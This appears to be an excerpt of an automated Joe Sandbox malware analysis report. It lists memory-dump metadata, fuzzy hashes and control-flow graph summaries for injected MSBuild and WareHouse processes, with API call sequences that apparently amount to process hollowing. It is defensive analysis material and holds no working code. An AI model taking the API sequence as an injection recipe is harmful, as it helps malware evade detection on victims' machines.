                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0950a4b8f493ff39e266cc62f04dff33f5c2c6ed96f73be85b819912d1a61666
                              • Instruction ID: 947336d8b17cd1769546215a9533e1900d8b42be8e4dfb52f74a23f3f5dcb3e9
                              • Opcode Fuzzy Hash: 0950a4b8f493ff39e266cc62f04dff33f5c2c6ed96f73be85b819912d1a61666
                              • Instruction Fuzzy Hash: 88E04F36310410DBC705AFAAD944A5CB7A7EFD8260B19C4AAF1498B771CF36DC52CB84
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c0f84bbe16b79e9b6157f428e21ceca23c3caeeedf8c7e2c1438e6f06e723c42
                              • Instruction ID: 05509d0e82eb3ba683b00582e71d9fa44b7f043816053c14d8994c64a4253e1b
                              • Opcode Fuzzy Hash: c0f84bbe16b79e9b6157f428e21ceca23c3caeeedf8c7e2c1438e6f06e723c42
                              • Instruction Fuzzy Hash: 13E08C6160D7C16FE31393649C547023BB0EFD6609F0D56D6E480CF2A3DA68EC0A9716
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 71adb96dbf62e38e162e7b0aed5700086aa4d583be56bc90b043d2e8bad4b578
                              • Instruction ID: 0a4008aa177c487a1aca4d396a7d9cfe2e55d74b16ebb815b648a0d55d5a79c8
                              • Opcode Fuzzy Hash: 71adb96dbf62e38e162e7b0aed5700086aa4d583be56bc90b043d2e8bad4b578
                              • Instruction Fuzzy Hash: B4E0EC36300514AB8B55AE9AD804C6AB7AAEFC966031580AAF5098B331CF72ED51CB94
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f2afd54d91e142adfc92132e640ac8416cfc022443b7df19ba384030373f822d
                              • Instruction ID: 97c4c48477342bd9e70270e2a9c09c2c85c7b1bcf6df356226731e31bf28a30e
                              • Opcode Fuzzy Hash: f2afd54d91e142adfc92132e640ac8416cfc022443b7df19ba384030373f822d
                              • Instruction Fuzzy Hash: 05E0127AA082441AD710CAB9E506BDA7FE8DBD5261F18847AE859D3242D634D002AF61
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 255601f0bd0d0abf2bc2f199cef5887f237c4c4caf41d0cb62b44cba0533950f
                              • Instruction ID: a5423998973e556d70b8b7bb150f8c782ecaa51da19b161f7798b9a5fc2a4348
                              • Opcode Fuzzy Hash: 255601f0bd0d0abf2bc2f199cef5887f237c4c4caf41d0cb62b44cba0533950f
                              • Instruction Fuzzy Hash: FBE0BD70E0430CAFCF58EFA9E44559DBBF5AB89300F0081A9E819E7350EA346A188F81
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3c15377813c8485b104e7886930187474c15b500a32ad3d7f7a87adbcfb1b257
                              • Instruction ID: d5a53d2b63f23e32b6c9e3fbe045cd0ec11b61dbc6e6677ab4acc27c87572fd5
                              • Opcode Fuzzy Hash: 3c15377813c8485b104e7886930187474c15b500a32ad3d7f7a87adbcfb1b257
                              • Instruction Fuzzy Hash: 41D0953130470457DF21955456B03FD7351CB441657301162CF1942110D53161025241
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 90da50779a9a7c5b1791bb6621e7ea7cc4e3ee9a3bb8cf233bcb13a6e3e53329
                              • Instruction ID: 651fb339ecec2b5e314e30fc9048d0aaaeb7f9908c5f10d3cba1101db9bfa7e0
                              • Opcode Fuzzy Hash: 90da50779a9a7c5b1791bb6621e7ea7cc4e3ee9a3bb8cf233bcb13a6e3e53329
                              • Instruction Fuzzy Hash: A3D02260C09B0C7FCA10CFA99D0557A3BA8CF27330B4003E2E838973F2E4129A000392
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: be9f934f65e2aab3672ba3cf20835abaae1416b76bcdc52614003b5e13d05f0a
                              • Instruction ID: c06d19ee628bd0ac0ab6b4a765933587efe0605dca8197f0b65588a99ba10013
                              • Opcode Fuzzy Hash: be9f934f65e2aab3672ba3cf20835abaae1416b76bcdc52614003b5e13d05f0a
                              • Instruction Fuzzy Hash: 22C012B20023217BCA121264DC5ABE72F9ADB09360F088822B488E2B25C5289892A1B1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5cdfebce4e891cc98438f870672d9a016627e50d2fbc4b143b3b3cc4175a83dc
                              • Instruction ID: ffec6aed5d61878c176e78015790924c04a71e535f83306fd34007ea46858f87

                              Execution Graph

                              Execution Coverage:25.6%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:27
                              Total number of Limit Nodes:0

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.1467709291.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_7ff886e20000_WareHouse.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.1467709291.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_7ff886e20000_WareHouse.jbxd
                              Similarity
                              • API ID: InternetOpen
                              • String ID:
                              • API String ID: 2038078732-0

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.1467709291.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_7ff886e20000_WareHouse.jbxd
                              Similarity
                              • API ID: InternetOpen
                              • String ID:
                              • API String ID: 2038078732-0

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.1467709291.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_7ff886e20000_WareHouse.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 92 7ff886e260c5-7ff886e260d1 93 7ff886e260dc-7ff886e26219 VirtualAllocEx 92->93 94 7ff886e260d3-7ff886e260db 92->94 99 7ff886e2621b 93->99 100 7ff886e26221-7ff886e2628d 93->100 94->93 99->100
                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.1467709291.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_7ff886e20000_WareHouse.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 103 7ff886e21671-7ff886e21715 106 7ff886e2173e-7ff886e217cb InternetReadFile 103->106 107 7ff886e21717-7ff886e2173b 103->107 108 7ff886e217cd 106->108 109 7ff886e217d3-7ff886e21833 106->109 107->106 108->109
                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.1467709291.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_7ff886e20000_WareHouse.jbxd
                              Similarity
                              • API ID: FileInternetRead
                              • String ID:
                              • API String ID: 778332206-0

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 112 7ff886e2649d-7ff886e264a9 113 7ff886e264ab-7ff886e264b3 112->113 114 7ff886e264b4-7ff886e265ef ReadProcessMemory 112->114 113->114 119 7ff886e265f1 114->119 120 7ff886e265f7-7ff886e26659 114->120 119->120
                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.1467709291.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_7ff886e20000_WareHouse.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 123 7ff886e25dce-7ff886e25ddb 124 7ff886e25ddd-7ff886e25de5 123->124 125 7ff886e25de6-7ff886e25ea2 123->125 124->125 129 7ff886e25ec4-7ff886e25f26 Wow64SetThreadContext 125->129 130 7ff886e25ea4-7ff886e25ec1 125->130 132 7ff886e25f28 129->132 133 7ff886e25f2e-7ff886e25f84 129->133 130->129 132->133
                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.1467709291.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_7ff886e20000_WareHouse.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 136 7ff886e25fb1-7ff886e26070 ResumeThread 140 7ff886e26078-7ff886e260c2 136->140 141 7ff886e26072 136->141 141->140
                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.1467709291.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_7ff886e20000_WareHouse.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0

                              Execution Graph

                              Execution Coverage:12.2%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:499
                              Total number of Limit Nodes:50
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: +($;0$K0
                              • API String ID: 0-1654014282

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3861565837.0000000006650000.00000040.00000800.00020000.00000000.sdmp, Offset: 06650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6650000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeQueryThunkValue
                              • String ID:
                              • API String ID: 1340289250-0

                              Control-flow Graph

                              [Control-flow graph, image not reproduced: first block 665af78-665af8a; API calls in graph: RegReplaceKeyA]
                              APIs
                              • RegReplaceKeyA.ADVAPI32(00000000), ref: 0665B167
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3861565837.0000000006650000.00000040.00000800.00020000.00000000.sdmp, Offset: 06650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6650000_MSBuild.jbxd
                              Similarity
                              • API ID: Replace
                              • String ID:
                              • API String ID: 3273661913-0
                              • Opcode ID: cf1e3ee75ce196988c5d9ef77b37665c19f7455fe3e15951c61de2601ca00c8c
                              • Instruction ID: 16093dc52a727d44409a6931f9eac1fa908c6342dee4e4112cbd2be54f683aea
                              • Opcode Fuzzy Hash: cf1e3ee75ce196988c5d9ef77b37665c19f7455fe3e15951c61de2601ca00c8c
                              • Instruction Fuzzy Hash: 1F12F674E002188FDB54CFA9C894AAEBBF2FF89310F158169D909A7355DB309D42CFA0

                              Control-flow Graph

                              [Control-flow graph, image not reproduced: first block 665b5b1-665b5e8; API calls in graph: LdrInitializeThunk]
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3861565837.0000000006650000.00000040.00000800.00020000.00000000.sdmp, Offset: 06650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6650000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: bb977c3ff26e2d34ad603049feec67e8f687e8e781a8ce38d1058882ff88e0ac
                              • Instruction ID: cac6f2a9c00228840dbd7e6561865090e825d2e2af9207719909a70aa7acc6dd
                              • Opcode Fuzzy Hash: bb977c3ff26e2d34ad603049feec67e8f687e8e781a8ce38d1058882ff88e0ac
                              • Instruction Fuzzy Hash: 0FC1E274E01218CFDB54DFAAC854A9DFBF2BF89300F209169D809AB354DB349985CF44

                              Control-flow Graph

                              [Control-flow graph, image not reproduced: first block 5e55a90-5e55acf; no named API calls in graph]
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: %
                              • API String ID: 0-2567322570
                              • Opcode ID: d2997f358ad3e540aea63fe2ce99db85c9d5fcad6a77f0b3cd07bd471f6a7760
                              • Instruction ID: 09d9a96fe24d6ec85ac7beb2a9e49338c8ef4cc1682fecd72297e8f623ce169a
                              • Opcode Fuzzy Hash: d2997f358ad3e540aea63fe2ce99db85c9d5fcad6a77f0b3cd07bd471f6a7760
                              • Instruction Fuzzy Hash: AB024970A003098FEB58EFA4C844AAEBBF2FF88314F148569D9169B395DB35D906CF50
                              APIs
                              • NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,?,?), ref: 0128C813
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815818637.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_1280000_MSBuild.jbxd
                              Similarity
                              • API ID: Memory64ReadVirtualWow64
                              • String ID:
                              • API String ID: 3357887247-0
                              • Opcode ID: 71f87e1f15417a6e72c1167d4a0838a2a762e11a535736fe9feb6b457dde4004
                              • Instruction ID: 487d0f8f3b2954c23a308dca0fe0acd3516acb0e6146c2d1ee5cb78fce186eb6
                              • Opcode Fuzzy Hash: 71f87e1f15417a6e72c1167d4a0838a2a762e11a535736fe9feb6b457dde4004
                              • Instruction Fuzzy Hash: B04174B9D112589FCF00DFA9D980ADEFBB1BB49310F20902AE918BB310D375A955CF64
                              APIs
                              • NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,?,?), ref: 0128C813
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815818637.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_1280000_MSBuild.jbxd
                              Similarity
                              • API ID: Memory64ReadVirtualWow64
                              • String ID:
                              • API String ID: 3357887247-0
                              • Opcode ID: 2c9d6119e618221f62c7875217ce35a215842f70c493ef24bef481af16456c54
                              • Instruction ID: ce8c4e1ad58873c663a461abf447a289131f76d053d86bb05ca9231d40eafa53
                              • Opcode Fuzzy Hash: 2c9d6119e618221f62c7875217ce35a215842f70c493ef24bef481af16456c54
                              • Instruction Fuzzy Hash: AA4164B9D112589FDF00CFA9D984ADEFBB1BB49310F20902AE918BB310D375A955CF64
                              APIs
                              • NtWow64QueryInformationProcess64.NTDLL(?,?,?,?,?), ref: 0128C614
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815818637.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_1280000_MSBuild.jbxd
                              Similarity
                              • API ID: InformationProcess64QueryWow64
                              • String ID:
                              • API String ID: 1933981353-0
                              • Opcode ID: 82976f367bfd6b63d8bdb050b4128af64c8eb66ca0c3679529914eb9287c8374
                              • Instruction ID: 8e2721f052528ed747baa68796348ea7c276eca92763376a09783365f0660ba8
                              • Opcode Fuzzy Hash: 82976f367bfd6b63d8bdb050b4128af64c8eb66ca0c3679529914eb9287c8374
                              • Instruction Fuzzy Hash: 554166B9D012589FCB00CFA9D984ADEFBB1FB49310F14902AE918B7310D375A905CF68
                              APIs
                              • NtWow64QueryInformationProcess64.NTDLL(?,?,?,?,?), ref: 0128C614
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815818637.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_1280000_MSBuild.jbxd
                              Similarity
                              • API ID: InformationProcess64QueryWow64
                              • String ID:
                              • API String ID: 1933981353-0
                              • Opcode ID: bdb20fb47070af040977b5a0663ced7a6038365af770440f48e9c35f513cc5dc
                              • Instruction ID: e80979305d03b4244ba327e3f3bbe85e9240111965ded4988c6975cd1461265b
                              • Opcode Fuzzy Hash: bdb20fb47070af040977b5a0663ced7a6038365af770440f48e9c35f513cc5dc
                              • Instruction Fuzzy Hash: D94146B9D012589FCB00CFA9D984ADEFBB1BB49310F14902AE918B7310D375A955CF68
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0e6d62fee38dd2cefba1f0954bd0a772e72ab82c4ff761b1605e8917bd841cac
                              • Instruction ID: 13b99c8263737b731d2eb9da7c9e7b5a4868c369c27f5b845d17f4ef18914836
                              • Opcode Fuzzy Hash: 0e6d62fee38dd2cefba1f0954bd0a772e72ab82c4ff761b1605e8917bd841cac
                              • Instruction Fuzzy Hash: 2D024974A002099FDB15DFA8C884AAEBBF2FF88320F148569E91ADB355DB35DC45CB50
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f6603e965604860ecdbd442280f0700b36df75286f0339431c185db8a96ffd3f
                              • Instruction ID: 646b60568bdeddd8a04091ee6deba98c15ec1515d8cdccc17850fa1998e58267
                              • Opcode Fuzzy Hash: f6603e965604860ecdbd442280f0700b36df75286f0339431c185db8a96ffd3f
                              • Instruction Fuzzy Hash: EFF13B34A00209DFDB08EFA8D854AAEBBF3FF88314F148469E846AB355DB35D945CB50

                              Control-flow Graph

                              [Control-flow graph, image not reproduced: first block 5e5ae50-5e5ae5c; no named API calls in graph]
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0259ce3b9c3c5aec91463dbaf4d1094b4d50e582c19c2a6d4291935a36db3cc3
                              • Instruction ID: c3b97195d98efda6cdeab9ab048ce0a2981a02004a32dc894456eb8c48980bdf
                              • Opcode Fuzzy Hash: 0259ce3b9c3c5aec91463dbaf4d1094b4d50e582c19c2a6d4291935a36db3cc3
                              • Instruction Fuzzy Hash: 66635E74A5021D9FEB259BA0CC55BEEBBB2FB48710F1080D9E6093B2D5CE795E809F44

                              Control-flow Graph

                              [Control-flow graph, image not reproduced: first block 5e5f0f8-5e5f157; no named API calls in graph]
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: ;U$kh*m^
                              • API String ID: 0-981172662
                              • Opcode ID: c50821a8c80dda439f2d83b70e6e7ec0c0eadc869dcc133b26c37fa3296271c9
                              • Instruction ID: d374682cc432001d6ad0e7dc1e270e6292e9150e8f19df7c30967964ac49c2d2
                              • Opcode Fuzzy Hash: c50821a8c80dda439f2d83b70e6e7ec0c0eadc869dcc133b26c37fa3296271c9
                              • Instruction Fuzzy Hash: B6615C78700209CFDB14DFA4D558AAEBBF6FF88224F109469E946DB365DB319C41CB90

                              Control-flow Graph

                              [Control-flow graph, image not reproduced: first block 665c218-665c270; API calls in graph: RegQueryValueA, LdrInitializeThunk]
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3861565837.0000000006650000.00000040.00000800.00020000.00000000.sdmp, Offset: 06650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6650000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 80ad6cc4d7baeeff81190bd0e47a0e172fae53438c1abe75f9f343873d778822
                              • Instruction ID: 294399bc2fabea809464ad6bd98cfe399125c60cbdaf608cbd50c158f65aad98
                              • Opcode Fuzzy Hash: 80ad6cc4d7baeeff81190bd0e47a0e172fae53438c1abe75f9f343873d778822
                              • Instruction Fuzzy Hash: DEB12734B006048FCB55DF39C588A6ABBF2FF99604B1680ACE946DB3A1DB34EC05CB51

                              Control-flow Graph

                              [Control-flow graph, image not reproduced: first block 5de2c80-5de2cb2; API calls in graph: LookupPrivilegeDisplayNameW]
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3857740782.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5de0000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e7081d80bfc9e84b054a1c529705a971b56a4d6c09a07de181cf927f53d6295f
                              • Instruction ID: 4a04eb95e10a0df48b09cc337de9f1236f23e36cef16cd133bfcceb61eb7e7ba
                              • Opcode Fuzzy Hash: e7081d80bfc9e84b054a1c529705a971b56a4d6c09a07de181cf927f53d6295f
                              • Instruction Fuzzy Hash: 9EB12679A012099FDB15DFA8D484A9DFBF6BF88310F24C15AE805AB361CB70ED45CB90

                              Control-flow Graph

                              [Control-flow graph, image not reproduced: first block 665af67-665af8a; API calls in graph: RegReplaceKeyA]
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3861565837.0000000006650000.00000040.00000800.00020000.00000000.sdmp, Offset: 06650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6650000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3975735d63ff907b14a6e9efc55054cb33b543852051a3c515cba5f9f055592d
                              • Instruction ID: 50921b14f41d47ced8420017fc37b80cb24ce68ff131b309b020e98fab69fe19
                              • Opcode Fuzzy Hash: 3975735d63ff907b14a6e9efc55054cb33b543852051a3c515cba5f9f055592d
                              • Instruction Fuzzy Hash: 81616E30F006198FDB94DF69C965A6EBBF6EF88610F158169D906EB364DB34DC01CBA0

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              [Control-flow graph (image not preserved); includes a call to RtlCreateHeap]
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815818637.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_1280000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 04f58ad9575117e6bf0fd9ab5fb23996d7b6e8534bf83a034f798992e895aabd
                              • Instruction ID: 71436788ad63f77d02a12db611c99d9d539eb49d93d60f0e46bd6f9d23b052de
                              • Opcode Fuzzy Hash: 04f58ad9575117e6bf0fd9ab5fb23996d7b6e8534bf83a034f798992e895aabd
                              • Instruction Fuzzy Hash: C941DCB9E052599FDB00CFA9E980A9EFBF1FF49310F14902AE818B7350D334A905CB64

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              [Control-flow graph (image not preserved); includes a call to OleGetClipboard]
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858087618.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e10000_MSBuild.jbxd
                              Similarity
                              • API ID: Clipboard
                              • String ID:
                              • API String ID: 220874293-0
                              • Opcode ID: 60a8e5668ec009de7bba2afe198d02f4666702654cb12e24c91d7e196eaccdd0
                              • Instruction ID: 62d4e9782bf0072ceb93af8121196ca57f996ae592ef93889e915198525844d8
                              • Opcode Fuzzy Hash: 60a8e5668ec009de7bba2afe198d02f4666702654cb12e24c91d7e196eaccdd0
                              • Instruction Fuzzy Hash: CB51EFB4E00348CFEB14CFE9C590B9EBBF5BF48304F20902AE845AB250DB759885CB95

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              [Control-flow graph (image not preserved); includes a call to DuplicateHandle]
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0128C0A0
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815818637.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_1280000_MSBuild.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 55631892f1bfb03f5f1a024b2576bdcaa50c8cd50136f53ee737d5339811d810
                              • Instruction ID: f6b4af26e13c88478b55315b5010830b3fefc3f6ac406c1ceafc639802306fab
                              • Opcode Fuzzy Hash: 55631892f1bfb03f5f1a024b2576bdcaa50c8cd50136f53ee737d5339811d810
                              • Instruction Fuzzy Hash: 4641BAB9D052989FCF01CFA9D980AEEBFB0AB0A310F14906AE814B7251D3349955CF64
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0128C0A0
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815818637.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_1280000_MSBuild.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 5db56059033a8c7ab0f8440f9645385aa882e158ee03bb2caf8f383e337a25db
                              • Instruction ID: b59ec91fb271e3c06d11131d69bea1a73d5d7ec84273ef48275b376f7d0f581a
                              • Opcode Fuzzy Hash: 5db56059033a8c7ab0f8440f9645385aa882e158ee03bb2caf8f383e337a25db
                              • Instruction Fuzzy Hash: 3C419AB9D042589FCF00CFA9D580AEEFBF1BB0A310F14902AE914B7250D375A955CF64
                              APIs
                              • RtlCreateHeap.NTDLL(00000000,00000000,00000000,00000000,?,?), ref: 0128E8EF
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815818637.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                              Joe Sandbox IDA Plugin
